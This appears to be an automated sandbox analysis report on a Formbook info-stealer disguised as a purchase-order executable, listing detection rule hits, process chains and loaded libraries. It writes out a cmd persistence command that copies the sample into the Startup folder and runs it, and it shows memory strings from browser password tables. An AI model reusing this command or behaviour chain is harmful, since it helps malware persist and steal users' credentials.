                Source: 00000018.00000002.5955097403.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000018.00000002.5957899892.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000012.00000002.2731267987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000018.00000002.5957820613.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000E.00000002.6031342259.000000000FC40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: PO# 81136575.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: sage.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: PO# 81136575.exe, Hq1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: sage.exe.4.dr, Hq1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@31/9@24/5
                Source: C:\Users\user\Desktop\PO# 81136575.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.lnkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\clip.exeMutant created: Local\SM0:8692:64:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8100:304:WilStaging_02
                Source: C:\Windows\SysWOW64\clip.exeMutant created: Local\SM0:8692:168:WilStaging_02
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeFile created: C:\Users\user\AppData\Local\Temp\sages.txtJump to behavior
                Source: PO# 81136575.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: PO# 81136575.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\PO# 81136575.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: clip.exe, 00000018.00000002.5960241652.0000000008163000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
                Source: clip.exe, 00000018.00000002.5955950229.00000000030E8000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2908988913.0000000003108000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000002.5955950229.0000000003108000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: clip.exe, 00000018.00000002.5960241652.00000000081C3000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2916902307.00000000081B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
                Source: PO# 81136575.exeReversingLabs: Detection: 73%
                Source: unknownProcess created: C:\Users\user\Desktop\PO# 81136575.exe "C:\Users\user\Desktop\PO# 81136575.exe"
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 49 > nul && copy "C:\Users\user\Desktop\PO# 81136575.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe" && ping 127.0.0.1 -n 49 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 49
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 49
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe"
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess created: C:\Users\user\AppData\Local\Temp\sages.exe "C:\Users\user\AppData\Local\Temp\sages.exe"
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess created: C:\Users\user\AppData\Local\Temp\sages.exe "C:\Users\user\AppData\Local\Temp\sages.exe"
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess created: C:\Users\user\AppData\Local\Temp\sages.exe "C:\Users\user\AppData\Local\Temp\sages.exe"
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess created: C:\Users\user\AppData\Local\Temp\sages.exe "C:\Users\user\AppData\Local\Temp\sages.exe"
                Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 49 > nul && copy "C:\Users\user\Desktop\PO# 81136575.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe" && ping 127.0.0.1 -n 49 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 49Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 49Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess created: C:\Users\user\AppData\Local\Temp\sages.exe "C:\Users\user\AppData\Local\Temp\sages.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess created: C:\Users\user\AppData\Local\Temp\sages.exe "C:\Users\user\AppData\Local\Temp\sages.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess created: C:\Users\user\AppData\Local\Temp\sages.exe "C:\Users\user\AppData\Local\Temp\sages.exe" Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
                Source: C:\Windows\SysWOW64\clip.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess created: C:\Users\user\AppData\Local\Temp\sages.exe "C:\Users\user\AppData\Local\Temp\sages.exe"
                Source: C:\Users\user\Desktop\PO# 81136575.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: edgegdi.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: dwrite.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: msvcp140_clr0400.dll
                Source: C:\Windows\SysWOW64\clip.exeSection loaded: version.dll
